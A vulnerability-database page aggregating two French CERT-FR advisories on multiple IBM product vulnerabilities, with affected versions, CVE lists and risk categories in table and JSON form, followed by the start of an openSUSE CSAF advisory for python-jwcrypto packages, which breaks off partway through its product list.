| IBM | WebSphere | WebSphere Application Server versions 8.5.x antérieures à 8.5.5.25 sans le correctif de sécurité PH61489 | ||
| IBM | WebSphere | WebSphere Application Server versions 9.0.x antérieures à 9.0.5.20 sans le correctif de sécurité PH61489 | ||
| IBM | QRadar | QRadar Deployment Intelligence App versions antérieures à 3.0.14 | ||
| IBM | QRadar | QRadar SIEM versions 7.5.x antérieures à 7.5.0 UP9 | ||
| IBM | Cloud Pak | Cloud Pak for Security versions antérieures à 1.10.23.0 | ||
| IBM | AIX | AIX versions 7.2 et 7.3 sans le correctif de sécurité 9211224a.240708.epkg.Z | ||
| IBM | QRadar | QRadar Suite Software versions antérieures à 1.10.23.0 | ||
| IBM | QRadar | Security QRadar EDR versions antérieures à 3.12.9 | ||
| IBM | VIOS | VIOS versions 3.1 et 4.1 sans le correctif de sécurité 9211224a.240708.epkg.Z | ||
| IBM | QRadar | QRadar WinCollect Agent versions antérieures à 10.1.11 |
| Title | Publication Time | Tags | |||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "Spectrum Control versions ant\u00e9rieures \u00e0 5.4.12",
"product": {
"name": "Spectrum",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "WebSphere Application Server versions 8.5.x ant\u00e9rieures \u00e0 8.5.5.25 sans le correctif de s\u00e9curit\u00e9 PH61489",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "WebSphere Application Server versions 9.0.x ant\u00e9rieures \u00e0 9.0.5.20 sans le correctif de s\u00e9curit\u00e9 PH61489",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "QRadar Deployment Intelligence App versions ant\u00e9rieures \u00e0 3.0.14",
"product": {
"name": "QRadar",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "QRadar SIEM versions 7.5.x ant\u00e9rieures \u00e0 7.5.0 UP9",
"product": {
"name": "QRadar",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Cloud Pak for Security versions ant\u00e9rieures \u00e0 1.10.23.0",
"product": {
"name": "Cloud Pak",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "AIX versions 7.2 et 7.3 sans le correctif de s\u00e9curit\u00e9 9211224a.240708.epkg.Z",
"product": {
"name": "AIX",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "QRadar Suite Software versions ant\u00e9rieures \u00e0 1.10.23.0",
"product": {
"name": "QRadar",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Security QRadar EDR versions ant\u00e9rieures \u00e0 3.12.9",
"product": {
"name": "QRadar",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "VIOS versions 3.1 et 4.1 sans le correctif de s\u00e9curit\u00e9 9211224a.240708.epkg.Z",
"product": {
"name": "VIOS",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "QRadar WinCollect Agent versions ant\u00e9rieures \u00e0 10.1.11",
"product": {
"name": "QRadar",
"vendor": {
"name": "IBM",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2023-29483",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-29483"
},
{
"name": "CVE-2024-1597",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-1597"
},
{
"name": "CVE-2024-29041",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-29041"
},
{
"name": "CVE-2024-28834",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-28834"
},
{
"name": "CVE-2024-28849",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-28849"
},
{
"name": "CVE-2024-35154",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35154"
},
{
"name": "CVE-2024-4068",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-4068"
},
{
"name": "CVE-2024-33602",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-33602"
},
{
"name": "CVE-2024-22353",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-22353"
},
{
"name": "CVE-2024-3772",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-3772"
},
{
"name": "CVE-2023-50312",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-50312"
},
{
"name": "CVE-2024-2466",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-2466"
},
{
"name": "CVE-2024-28102",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-28102"
},
{
"name": "CVE-2024-34069",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34069"
},
{
"name": "CVE-2019-11358",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-11358"
},
{
"name": "CVE-2020-15778",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-15778"
},
{
"name": "CVE-2024-34997",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34997"
},
{
"name": "CVE-2022-3287",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3287"
},
{
"name": "CVE-2020-13936",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-13936"
},
{
"name": "CVE-2023-44487",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-44487"
},
{
"name": "CVE-2024-29857",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-29857"
},
{
"name": "CVE-2023-25193",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-25193"
},
{
"name": "CVE-2024-33600",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-33600"
},
{
"name": "CVE-2023-45802",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45802"
},
{
"name": "CVE-2023-3635",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-3635"
},
{
"name": "CVE-2024-25026",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-25026"
},
{
"name": "CVE-2024-34062",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34062"
},
{
"name": "CVE-2024-33599",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-33599"
},
{
"name": "CVE-2024-4067",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-4067"
},
{
"name": "CVE-2024-30172",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-30172"
},
{
"name": "CVE-2021-41072",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-41072"
},
{
"name": "CVE-2024-28176",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-28176"
},
{
"name": "CVE-2024-1135",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-1135"
},
{
"name": "CVE-2020-23064",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-23064"
},
{
"name": "CVE-2023-6918",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6918"
},
{
"name": "CVE-2024-2379",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-2379"
},
{
"name": "CVE-2024-22329",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-22329"
},
{
"name": "CVE-2024-0450",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-0450"
},
{
"name": "CVE-2024-2004",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-2004"
},
{
"name": "CVE-2023-45803",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45803"
},
{
"name": "CVE-2023-31122",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-31122"
},
{
"name": "CVE-2024-35195",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35195"
},
{
"name": "CVE-2023-51775",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-51775"
},
{
"name": "CVE-2024-33601",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-33601"
},
{
"name": "CVE-2024-3019",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-3019"
},
{
"name": "CVE-2024-5206",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-5206"
},
{
"name": "CVE-2024-27088",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27088"
},
{
"name": "CVE-2023-43804",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-43804"
},
{
"name": "CVE-2024-25062",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-25062"
},
{
"name": "CVE-2024-2398",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-2398"
},
{
"name": "CVE-2024-26461",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26461"
},
{
"name": "CVE-2024-26458",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26458"
},
{
"name": "CVE-2023-44483",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-44483"
},
{
"name": "CVE-2023-6004",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6004"
},
{
"name": "CVE-2020-11022",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-11022"
},
{
"name": "CVE-2024-28863",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-28863"
},
{
"name": "CVE-2024-4603",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-4603"
},
{
"name": "CVE-2024-27270",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27270"
},
{
"name": "CVE-2023-31484",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-31484"
},
{
"name": "CVE-2024-30171",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-30171"
},
{
"name": "CVE-2024-4741",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-4741"
},
{
"name": "CVE-2023-46158",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-46158"
},
{
"name": "CVE-2024-34064",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34064"
},
{
"name": "CVE-2024-6387",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6387"
},
{
"name": "CVE-2024-25023",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-25023"
},
{
"name": "CVE-2024-2511",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-2511"
},
{
"name": "CVE-2021-40153",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-40153"
},
{
"name": "CVE-2023-5752",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-5752"
},
{
"name": "CVE-2024-2961",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-2961"
},
{
"name": "CVE-2024-28182",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-28182"
},
{
"name": "CVE-2023-6597",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6597"
},
{
"name": "CVE-2020-11023",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-11023"
}
],
"initial_release_date": "2024-07-12T00:00:00",
"last_revision_date": "2024-07-12T00:00:00",
"links": [],
"reference": "CERTFR-2024-AVI-0579",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2024-07-12T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Injection de code indirecte \u00e0 distance (XSS)"
},
{
"description": "Injection de requ\u00eates ill\u00e9gitimes par rebond (CSRF)"
},
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits IBM. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance, un d\u00e9ni de service \u00e0 distance et une atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits IBM",
"vendor_advisories": [
{
"published_at": "2024-07-08",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7159768",
"url": "https://www.ibm.com/support/pages/node/7159768"
},
{
"published_at": "2024-07-11",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7160017",
"url": "https://www.ibm.com/support/pages/node/7160017"
},
{
"published_at": "2024-07-08",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7159781",
"url": "https://www.ibm.com/support/pages/node/7159781"
},
{
"published_at": "2024-07-11",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7160014",
"url": "https://www.ibm.com/support/pages/node/7160014"
},
{
"published_at": "2024-07-12",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7160134",
"url": "https://www.ibm.com/support/pages/node/7160134"
},
{
"published_at": "2024-07-08",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7159771",
"url": "https://www.ibm.com/support/pages/node/7159771"
},
{
"published_at": "2024-07-09",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7159867",
"url": "https://www.ibm.com/support/pages/node/7159867"
},
{
"published_at": "2024-07-09",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7159865",
"url": "https://www.ibm.com/support/pages/node/7159865"
},
{
"published_at": "2024-07-08",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7159527",
"url": "https://www.ibm.com/support/pages/node/7159527"
},
{
"published_at": "2024-07-08",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7159825",
"url": "https://www.ibm.com/support/pages/node/7159825"
},
{
"published_at": "2024-07-10",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7159934",
"url": "https://www.ibm.com/support/pages/node/7159934"
},
{
"published_at": "2024-07-09",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7159920",
"url": "https://www.ibm.com/support/pages/node/7159920"
},
{
"published_at": "2024-07-11",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7160013",
"url": "https://www.ibm.com/support/pages/node/7160013"
}
]
}
CERTFR-2024-AVI-0366
Vulnerability from certfr_avis
De multiples vulnérabilités ont été découvertes dans les produits IBM. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, une élévation de privilèges et un déni de service à distance.
Solution
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
None| Vendor | Product | Description | ||
|---|---|---|---|---|
| IBM | Cloud Pak | IBM Cloud Pak for Security versions 1.10.x.x antérieures à 1.10.21.0 | ||
| IBM | QRadar Suite Software | QRadar Suite Software versions 1.10.x.x antérieures à 1.10.21.0 | ||
| IBM | QRadar Assistant | QRadar Assistant versions antérieures à 3.7.0 | ||
| IBM | Cognos Analytics | Cognos Analytics versions 12.0.x antérieures à 12.0.3 | ||
| IBM | QRadar SIEM | QRadar SIEM sur Azure Marketplace versions antérieures à 7.3.x postérieures à 7.3.3 et antérieures à 7.5.0 avec le paquet OMI installé | ||
| IBM | WebSphere | WebSphere eXtreme Scale versions 8.6.1.x antérieures à 8.6.1.6 sans le correctif de sécurité PH61029 | ||
| IBM | Cognos Analytics | Cognos Analytics versions 11.2.x FP2 antérieures à 11.2.4 FP3 |
| Title | Publication Time | Tags | |||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "IBM Cloud Pak for Security versions 1.10.x.x ant\u00e9rieures \u00e0 1.10.21.0",
"product": {
"name": "Cloud Pak",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "QRadar Suite Software versions 1.10.x.x ant\u00e9rieures \u00e0 1.10.21.0",
"product": {
"name": "QRadar Suite Software",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "QRadar Assistant versions ant\u00e9rieures \u00e0 3.7.0",
"product": {
"name": "QRadar Assistant",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Cognos Analytics versions 12.0.x ant\u00e9rieures \u00e0 12.0.3",
"product": {
"name": "Cognos Analytics",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "QRadar SIEM sur Azure Marketplace versions ant\u00e9rieures \u00e0 7.3.x post\u00e9rieures \u00e0 7.3.3 et ant\u00e9rieures \u00e0 7.5.0 avec le paquet OMI install\u00e9",
"product": {
"name": "QRadar SIEM",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "WebSphere eXtreme Scale versions 8.6.1.x ant\u00e9rieures \u00e0 8.6.1.6 sans le correctif de s\u00e9curit\u00e9 PH61029",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Cognos Analytics versions 11.2.x FP2 ant\u00e9rieures \u00e0 11.2.4 FP3",
"product": {
"name": "Cognos Analytics",
"vendor": {
"name": "IBM",
"scada": false
}
}
}
],
"affected_systems_content": null,
"content": "## Solution\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des\ncorrectifs (cf. section Documentation).\n",
"cves": [
{
"name": "CVE-2023-25577",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-25577"
},
{
"name": "CVE-2022-31116",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-31116"
},
{
"name": "CVE-2023-28841",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-28841"
},
{
"name": "CVE-2024-28849",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-28849"
},
{
"name": "CVE-2023-28840",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-28840"
},
{
"name": "CVE-2023-45857",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45857"
},
{
"name": "CVE-2021-30465",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-30465"
},
{
"name": "CVE-2022-29162",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-29162"
},
{
"name": "CVE-2022-31117",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-31117"
},
{
"name": "CVE-2023-23934",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-23934"
},
{
"name": "CVE-2023-27561",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-27561"
},
{
"name": "CVE-2024-28102",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-28102"
},
{
"name": "CVE-2019-14322",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-14322"
},
{
"name": "CVE-2023-44270",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-44270"
},
{
"name": "CVE-2023-34462",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-34462"
},
{
"name": "CVE-2019-1010083",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-1010083"
},
{
"name": "CVE-2018-18074",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-18074"
},
{
"name": "CVE-2022-23541",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-23541"
},
{
"name": "CVE-2023-44487",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-44487"
},
{
"name": "CVE-2022-40897",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-40897"
},
{
"name": "CVE-2023-5072",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-5072"
},
{
"name": "CVE-2024-21503",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21503"
},
{
"name": "CVE-2022-23540",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-23540"
},
{
"name": "CVE-2024-1135",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-1135"
},
{
"name": "CVE-2024-21501",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21501"
},
{
"name": "CVE-2024-22195",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-22195"
},
{
"name": "CVE-2021-43784",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-43784"
},
{
"name": "CVE-2023-28842",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-28842"
},
{
"name": "CVE-2024-29131",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-29131"
},
{
"name": "CVE-2024-21334",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21334"
},
{
"name": "CVE-2023-25809",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-25809"
},
{
"name": "CVE-2016-10745",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-10745"
},
{
"name": "CVE-2023-46136",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-46136"
},
{
"name": "CVE-2024-29133",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-29133"
},
{
"name": "CVE-2023-44981",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-44981"
},
{
"name": "CVE-2024-27088",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27088"
},
{
"name": "CVE-2022-23539",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-23539"
},
{
"name": "CVE-2018-1000656",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-1000656"
},
{
"name": "CVE-2024-25047",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-25047"
},
{
"name": "CVE-2021-28363",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-28363"
},
{
"name": "CVE-2020-15366",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-15366"
},
{
"name": "CVE-2015-3627",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-3627"
},
{
"name": "CVE-2023-31484",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-31484"
},
{
"name": "CVE-2023-28642",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-28642"
},
{
"name": "CVE-2016-10516",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-10516"
},
{
"name": "CVE-2020-25032",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-25032"
},
{
"name": "CVE-2021-45958",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-45958"
},
{
"name": "CVE-2023-30861",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-30861"
},
{
"name": "CVE-2021-43565",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-43565"
},
{
"name": "CVE-2023-32681",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-32681"
},
{
"name": "CVE-2020-28493",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-28493"
},
{
"name": "CVE-2023-26159",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-26159"
},
{
"name": "CVE-2024-24758",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-24758"
}
],
"initial_release_date": "2024-05-03T00:00:00",
"last_revision_date": "2024-05-03T00:00:00",
"links": [],
"reference": "CERTFR-2024-AVI-0366",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2024-05-03T00:00:00.000000"
}
],
"risks": [
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "\u00c9l\u00e9vation de privil\u00e8ges"
},
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
},
{
"description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Injection de code indirecte \u00e0 distance (XSS)"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans \u003cspan\nclass=\"textit\"\u003eles produits IBM\u003c/span\u003e. Certaines d\u0027entre elles\npermettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire\n\u00e0 distance, une \u00e9l\u00e9vation de privil\u00e8ges et un d\u00e9ni de service \u00e0\ndistance.\n",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits IBM",
"vendor_advisories": [
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7149736 du 29 avril 2024",
"url": "https://www.ibm.com/support/pages/node/7149736"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7150045 du 01 mai 2024",
"url": "https://www.ibm.com/support/pages/node/7150045"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7149967 du 01 mai 2024",
"url": "https://www.ibm.com/support/pages/node/7149967"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7149874 du 01 mai 2024",
"url": "https://www.ibm.com/support/pages/node/7149874"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7150150 du 03 mai 2024",
"url": "https://www.ibm.com/support/pages/node/7150150"
}
]
}
opensuse-su-2024:13798-1
Vulnerability from csaf_opensuse
Notes
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "python310-jwcrypto-1.5.6-2.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the python310-jwcrypto-1.5.6-2.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2024-13798",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2024_13798-1.json"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-28102 page",
"url": "https://www.suse.com/security/cve/CVE-2024-28102/"
}
],
"title": "python310-jwcrypto-1.5.6-2.1 on GA media",
"tracking": {
"current_release_date": "2024-06-15T00:00:00Z",
"generator": {
"date": "2024-06-15T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2024:13798-1",
"initial_release_date": "2024-06-15T00:00:00Z",
"revision_history": [
{
"date": "2024-06-15T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "python310-jwcrypto-1.5.6-2.1.aarch64",
"product": {
"name": "python310-jwcrypto-1.5.6-2.1.aarch64",
"product_id": "python310-jwcrypto-1.5.6-2.1.aarch64"
}
},
{
"category": "product_version",
"name": "python311-jwcrypto-1.5.6-2.1.aarch64",
"product": {
"name": "python311-jwcrypto-1.5.6-2.1.aarch64",
"product_id": "python311-jwcrypto-1.5.6-2.1.aarch64"
}
},
{
"category": "product_version",
"name": "python312-jwcrypto-1.5.6-2.1.aarch64",
"product": {
"name": "python312-jwcrypto-1.5.6-2.1.aarch64",
"product_id": "python312-jwcrypto-1.5.6-2.1.aarch64"
}
},
{
"category": "product_version",
"name": "python39-jwcrypto-1.5.6-2.1.aarch64",
"product": {
"name": "python39-jwcrypto-1.5.6-2.1.aarch64",
"product_id": "python39-jwcrypto-1.5.6-2.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "python310-jwcrypto-1.5.6-2.1.ppc64le",
"product": {
"name": "python310-jwcrypto-1.5.6-2.1.ppc64le",
"product_id": "python310-jwcrypto-1.5.6-2.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python311-jwcrypto-1.5.6-2.1.ppc64le",
"product": {
"name": "python311-jwcrypto-1.5.6-2.1.ppc64le",
"product_id": "python311-jwcrypto-1.5.6-2.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python312-jwcrypto-1.5.6-2.1.ppc64le",
"product": {
"name": "python312-jwcrypto-1.5.6-2.1.ppc64le",
"product_id": "python312-jwcrypto-1.5.6-2.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python39-jwcrypto-1.5.6-2.1.ppc64le",
"product": {
"name": "python39-jwcrypto-1.5.6-2.1.ppc64le",
"product_id": "python39-jwcrypto-1.5.6-2.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "python310-jwcrypto-1.5.6-2.1.s390x",
"product": {
"name": "python310-jwcrypto-1.5.6-2.1.s390x",
"product_id": "python310-jwcrypto-1.5.6-2.1.s390x"
}
},
{
"category": "product_version",
"name": "python311-jwcrypto-1.5.6-2.1.s390x",
"product": {
"name": "python311-jwcrypto-1.5.6-2.1.s390x",
"product_id": "python311-jwcrypto-1.5.6-2.1.s390x"
}
},
{
"category": "product_version",
"name": "python312-jwcrypto-1.5.6-2.1.s390x",
"product": {
"name": "python312-jwcrypto-1.5.6-2.1.s390x",
"product_id": "python312-jwcrypto-1.5.6-2.1.s390x"
}
},
{
"category": "product_version",
"name": "python39-jwcrypto-1.5.6-2.1.s390x",
"product": {
"name": "python39-jwcrypto-1.5.6-2.1.s390x",
"product_id": "python39-jwcrypto-1.5.6-2.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "python310-jwcrypto-1.5.6-2.1.x86_64",
"product": {
"name": "python310-jwcrypto-1.5.6-2.1.x86_64",
"product_id": "python310-jwcrypto-1.5.6-2.1.x86_64"
}
},
